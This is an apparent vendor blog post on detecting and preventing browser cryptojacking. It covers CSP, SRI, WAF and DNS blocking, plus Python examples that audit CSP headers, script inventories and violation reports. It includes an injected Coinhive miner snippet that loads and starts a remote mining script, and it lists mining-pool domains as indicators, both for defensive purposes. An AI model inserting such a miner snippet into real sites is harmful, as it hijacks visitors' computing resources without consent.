April 28, 2026|8 min read

Cryptojacking Detection and Prevention: Stop Drive-By Mining on Your Website

Cryptojacking silently mines cryptocurrency using your visitors' CPUs without their knowledge. Learn how to detect injected mining scripts and configure CSP to block them.

ZeriFlow Team

1,373 words


Cryptojacking is the unauthorized use of someone else's computing resources to mine cryptocurrency. On the web, this means your website's visitors unknowingly donate their CPU cycles to an attacker — their browser tab runs JavaScript that solves cryptographic puzzles, generating cryptocurrency deposited into the attacker's wallet while degrading your users' experience and battery life.

Is your site exposed? Run a free ZeriFlow scan →

What Is Cryptojacking?

The term combines "cryptocurrency" and "hijacking." Unlike ransomware or data theft, cryptojacking doesn't immediately destroy data or steal identifiable information — it silently consumes resources. This makes it particularly insidious: many victims don't notice for weeks or months.

At its peak in 2017–2018, Coinhive — a legitimate-turned-abused JavaScript Monero mining library — was found on tens of thousands of websites, including government sites, The Pirate Bay, and several newspaper websites. A single injected script tag was enough to start mining across every visitor's browser session.


How Drive-By Cryptomining Works

Injected Scripts on Compromised Websites

The most common web cryptojacking attack: an attacker compromises a website (via XSS, a CMS plugin vulnerability, a web shell, or a supply chain attack against a third-party script) and injects a cryptomining JavaScript library.

Every visitor to the site runs the miner in their browser. The script uses WebAssembly for near-native performance, typically consuming 80–100% of one CPU core. Sophisticated implementations throttle CPU usage to avoid detection and reduce user complaints.

Example injected script:

```html
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY');
  miner.start();
</script>
```

Third-Party Script Compromise

A website may unknowingly serve cryptomining code through a compromised analytics provider, A/B testing tool, or advertising network. The website owner has a clean codebase — but a third-party script they load was modified by an attacker. This is a supply chain attack with cryptojacking as the payload.

Malvertising

Attackers purchase advertising slots on ad networks and serve ads containing mining scripts. Even major, reputable websites have been hit this way — the site itself is clean, but the ad iframe runs the miner.

Server-Side Cryptomining

Cryptojacking also affects web servers directly: attackers with server access (via web shells, compromised credentials, or misconfigurations) install mining software like XMRig directly on the server, consuming server CPU for 24/7 mining. This is distinct from browser-based cryptojacking but equally damaging.


How to Detect Cryptojacking on Your Website

CPU Usage Monitoring for Visitors

The most visible symptom is abnormal CPU usage while a page is open: fan noise increases, the browser becomes sluggish, and the battery drains faster. As a website owner, test your own pages:

  1. Open Chrome DevTools → Performance tab
  2. Load your page and watch CPU utilization
  3. Cryptomining typically shows sustained high CPU in JavaScript execution, often in a Web Worker

Code Review and Script Auditing

Regularly audit all <script> tags in your HTML — both inline scripts and external sources. Look for:

  - Unknown script domains you didn't intentionally include
  - Scripts loaded from CDNs that aren't in your approved list
  - Inline scripts containing obfuscated code or WebAssembly.instantiate calls

Server-Side File Scanning

Use LMD, ClamAV, or rkhunter to scan for known cryptominer binaries on your server. Monitor for new cron jobs, new processes consuming high CPU, and unexplained network connections to mining pool addresses (common pools: pool.supportxmr.com, mine.xmrpool.net, moneroocean.stream).

Browser Extensions for Detection

Extensions like No Coin and minerBlock maintain blocklists of known mining script domains and can be used during auditing to confirm whether a site serves mining code.


Content Security Policy: The Primary Defense

Content Security Policy (CSP) is the most effective browser-level defense against cryptojacking. A properly configured CSP prevents unauthorized scripts from executing at all.

The key directive is script-src:

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-analytics.com

With this policy:

  - Inline scripts are blocked by default (unless you use 'unsafe-inline' — avoid this)
  - Scripts from any domain not listed in script-src are blocked
  - Injected mining scripts loading from external domains cannot execute
  - Web Workers (which cryptominers use to avoid blocking the main thread) are covered by worker-src — set this to 'self' as well

Blocking WebAssembly is an additional hardening step. The 'wasm-unsafe-eval' source expression in script-src controls whether WebAssembly may be compiled; some browsers require it (or the broader 'unsafe-eval') before WASM runs at all. By leaving both out of script-src, you prevent WASM-based miners from compiling even if the JavaScript restrictions are bypassed.
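As an added example (not ZeriFlow's scanner), the following parses a Content-Security-Policy header and flags the script-src and worker-src weaknesses described above; the WEAK and HARDENED policies are constructed samples, and the trusted-analytics.com and csp.yoursite.com hosts are the placeholders used elsewhere on this page.

```python
"""Added example, not ZeriFlow's scanner: parse a Content-Security-Policy
header and flag the script-src and worker-src weaknesses discussed above.
WEAK and HARDENED at the bottom are constructed sample policies."""
from typing import Dict, List

def parse_csp(header: str) -> Dict[str, List[str]]:
    """Directives are ';'-separated: first token is the case-insensitive
    directive name, the remaining tokens are its source expressions."""
    policy: Dict[str, List[str]] = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def audit_csp(header: str) -> List[str]:
    """Return findings; [] means the script controls look tight.
    (script-src-elem/-attr overrides are not modelled here.)"""
    policy = parse_csp(header)
    script = policy.get("script-src", policy.get("default-src"))  # CSP fallback rule
    if script is None:
        return ["no script-src or default-src: any script, inline or external, may run"]
    script = [s.lower() for s in script]
    findings: List[str] = []
    # A nonce or hash makes browsers ignore 'unsafe-inline', so only flag it on its own.
    if "'unsafe-inline'" in script and not any(s.startswith(("'nonce-", "'sha")) for s in script):
        findings.append("'unsafe-inline' in script-src: an injected inline miner runs")
    if any(s in ("*", "http:", "https:", "data:") for s in script):
        findings.append("scheme or host wildcard in script-src: any external script loads")
    if "'unsafe-eval'" in script or "'wasm-unsafe-eval'" in script:
        findings.append("'unsafe-eval' or 'wasm-unsafe-eval': WebAssembly miners can compile")
    if "worker-src" not in policy:
        findings.append("worker-src not set: workers fall back to child-src/script-src; set 'self'")
    return findings

WEAK = "default-src *; script-src * 'unsafe-inline' 'unsafe-eval'"
HARDENED = ("default-src 'self'; script-src 'self' https://trusted-analytics.com; "
            "worker-src 'self'; report-uri https://csp.yoursite.com/report")

if __name__ == "__main__":
    for name, header in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_csp(header) or ["no findings"])
```

Run against the header shown earlier in this section, the only finding is the missing explicit worker-src.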

ZeriFlow's scan checks whether your site has a Content Security Policy deployed and evaluates its script-src configuration for overly permissive directives.

Check your CSP configuration with ZeriFlow →


Additional Detection and Prevention Measures

Subresource Integrity (SRI) for External Scripts

As covered in supply chain security: add SRI hashes to all external scripts. If a third-party script is modified to include a miner, the hash mismatch prevents it from executing.

Web Application Firewall Rules

WAF rules can block requests to known mining pool domains and IP addresses. Cloud WAF providers (Cloudflare, AWS WAF) offer managed blocklists that include mining infrastructure.

DNS-Level Blocking

Network-level blocking of known mining pool domains prevents browser-based and server-side miners from reaching their pools. Tools like Pi-hole or enterprise DNS security products maintain regularly updated blocklists.

Continuous Monitoring with Script Change Detection

Implement monitoring that alerts on changes to your website's HTML or loaded scripts. Tools like Detectify, NightWatch, or custom scripts using diff against a known-good snapshot can catch injected code within minutes.
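The script audit and snapshot diff described in the two sections above, as one added example that is not a ZeriFlow or vendor tool: it inventories the <script> tags in a page, checks external hosts against an allowlist, flags inline code carrying the miner indicators named earlier, and reports anything not in a known-good snapshot. The sample HTML and the allowed host are constructed; the injected snippet is the Coinhive example from this page.

```python
"""Added example, not ZeriFlow's or any vendor's tool: inventory a page's
<script> tags, check external hosts against an allowlist, flag inline code
with miner indicators, and diff against a known-good snapshot. The sample
HTML at the bottom is constructed for the demonstration."""
import hashlib
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
MINER_INDICATORS = re.compile(r"WebAssembly\.(instantiate|compile)|CoinHive", re.I)

def inventory(html: str) -> Dict[str, str]:
    """Map each script to a stable key: external scripts by URL, inline
    scripts by a hash of their body (the value keeps the body for review)."""
    inv: Dict[str, str] = {}
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            inv[src.group(1)] = "external"
        else:
            inv["inline:" + hashlib.sha256(body.encode()).hexdigest()[:16]] = body
    return inv

def audit(html: str, allowed: Set[str], known_good: Dict[str, str]) -> List[str]:
    """Findings for one page; a clean, unchanged page yields []."""
    findings: List[str] = []
    for key, body in inventory(html).items():
        # A relative src is same-origin: it has no host and skips the allowlist check.
        host = urlparse(key).hostname if body == "external" else None
        if host and host not in allowed:
            findings.append(f"script from unapproved host: {key}")
        if body != "external" and MINER_INDICATORS.search(body):
            findings.append(f"inline script with miner indicators: {key}")
        if key not in known_good:
            findings.append(f"script absent from known-good snapshot: {key}")
    return findings

# Constructed sample: the known-good page, and the same page with the miner injected.
CLEAN = ('<head><script src="https://trusted-analytics.com/a.js"></script>'
         '<script src="/js/app.js"></script><script>window.app={ready:true};</script></head>')
INJECTED = CLEAN.replace(
    "</head>",
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    '<script>var m=new CoinHive.Anonymous("KEY");m.start();</script></head>')
ALLOWED = {"trusted-analytics.com"}
SNAPSHOT = inventory(CLEAN)   # taken at the last known-good deployment
```

Running audit(INJECTED, ALLOWED, SNAPSHOT) yields four findings: two for the unapproved Coinhive host and two for the inline miner, each also flagged as absent from the snapshot.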

Content Security Policy Reporting

Add a report-uri or report-to directive to your CSP to receive violation reports when blocked scripts attempt to execute:

Content-Security-Policy: script-src 'self'; report-uri https://csp.yoursite.com/report

This gives you real-time visibility into attempted script injections, including cryptomining scripts.
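An added example of what the receiving endpoint does with those reports (not ZeriFlow code): it normalises the legacy report-uri JSON object and the Reporting API array that report-to delivers, then keeps only violations where a script or worker load was blocked. Both sample reports are constructed; www.example.com and cdn.example.org are placeholder hosts.

```python
"""Added example, not ZeriFlow code: normalise CSP violation reports arriving
at a report-uri (legacy JSON object) or report-to (Reporting API array)
endpoint and keep the ones where a script or worker load was blocked.
Both sample reports at the bottom are constructed."""
import json
from typing import Dict, List
from urllib.parse import urlparse

SCRIPT_DIRECTIVES = {"script-src", "script-src-elem", "script-src-attr", "worker-src"}

def normalise(body: str) -> List[Dict[str, str]]:
    """Return [{directive, blocked, page}] regardless of which report
    format the browser used; anything unrecognised yields []."""
    data = json.loads(body)
    if isinstance(data, dict) and "csp-report" in data:            # report-uri
        r = data["csp-report"]
        return [{"directive": r.get("effective-directive") or r.get("violated-directive", ""),
                 "blocked": r.get("blocked-uri", ""), "page": r.get("document-uri", "")}]
    if isinstance(data, list):                                       # report-to
        return [{"directive": i.get("body", {}).get("effectiveDirective", ""),
                 "blocked": i.get("body", {}).get("blockedURL", ""),
                 "page": i.get("body", {}).get("documentURL", "")}
                for i in data if i.get("type") == "csp-violation"]
    return []

def script_violations(body: str) -> List[Dict[str, str]]:
    """Script/worker violations only, with the blocked host extracted so
    reports can be grouped by source; keywords like 'inline' stay as-is."""
    out: List[Dict[str, str]] = []
    for r in normalise(body):
        if r["directive"] in SCRIPT_DIRECTIVES:
            r["host"] = urlparse(r["blocked"]).hostname or r["blocked"]
            out.append(r)
    return out

# Constructed samples: one legacy report for an external script, and one Reporting
# API batch holding an inline-script violation plus an unrelated image violation.
LEGACY = json.dumps({"csp-report": {
    "document-uri": "https://www.example.com/", "effective-directive": "script-src-elem",
    "blocked-uri": "https://coinhive.com/lib/coinhive.min.js",
    "original-policy": "script-src 'self'; report-uri https://csp.yoursite.com/report"}})
BATCH = json.dumps([
    {"type": "csp-violation", "body": {"documentURL": "https://www.example.com/",
                                       "effectiveDirective": "script-src-elem", "blockedURL": "inline"}},
    {"type": "csp-violation", "body": {"documentURL": "https://www.example.com/",
                                       "effectiveDirective": "img-src", "blockedURL": "https://cdn.example.org/x.png"}}])
```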


Removing Cryptomining Code

If you discover cryptojacking on your site:

  1. Identify the source — is it in your own code, a plugin, or a third-party script? Check all script inclusions and compare against your last known-good deployment.
  2. Remove the malicious code — delete the injected script tags or update the compromised dependency.
  3. Find and close the entry point — a web shell, plugin vulnerability, or compromised supply chain dependency.
  4. Audit for additional malware — cryptomining is often one of several payloads installed after a compromise.
  5. Rotate credentials — server passwords, hosting panel credentials, CMS admin accounts.
  6. Deploy CSP — if you weren't running one before, now is the time.

FAQ

Q: Can cryptojacking harm my website visitors' hardware?

A: Sustained high CPU load generates heat. On laptops with poor thermal management, prolonged cryptomining could theoretically accelerate component wear. More practically, it drains battery quickly and degrades performance — users notice, get frustrated, and leave.

Q: Does blocking JavaScript entirely prevent cryptojacking?

A: Yes, but it breaks almost every modern website. The practical solution is CSP with a specific script-src allowlist, which blocks unauthorized scripts while permitting your legitimate JavaScript.

Q: Can cryptojacking happen on static sites?

A: Yes. If your static site loads any third-party scripts (analytics, fonts, ads, chat widgets), those scripts can be compromised and inject miners. SRI hashes and a restrictive CSP script-src apply equally to static sites.

Q: Is cryptojacking illegal?

A: In most jurisdictions, running mining code on visitors' browsers without explicit consent is unauthorized access to a computer system and therefore illegal. For website owners who unknowingly serve mining scripts due to a compromise, liability is generally not pursued, but the reputational damage is real.

Q: What does ZeriFlow specifically check for cryptojacking prevention?

A: ZeriFlow checks your Content-Security-Policy header, including the script-src directive that is the primary defense against injected mining scripts. It flags sites with missing CSP, overly permissive 'unsafe-inline' directives, or absent script-src restrictions.


Conclusion

Cryptojacking abuses visitor trust and computing resources, often operating invisibly for months. The defenses are clear: a restrictive Content Security Policy with a tight script-src allowlist, SRI hashes on external scripts, regular code audits, and monitoring for unauthorized script changes. Deploying a CSP is a one-time configuration change that eliminates the entire browser-based cryptomining vector.

Scan your site free on ZeriFlow →
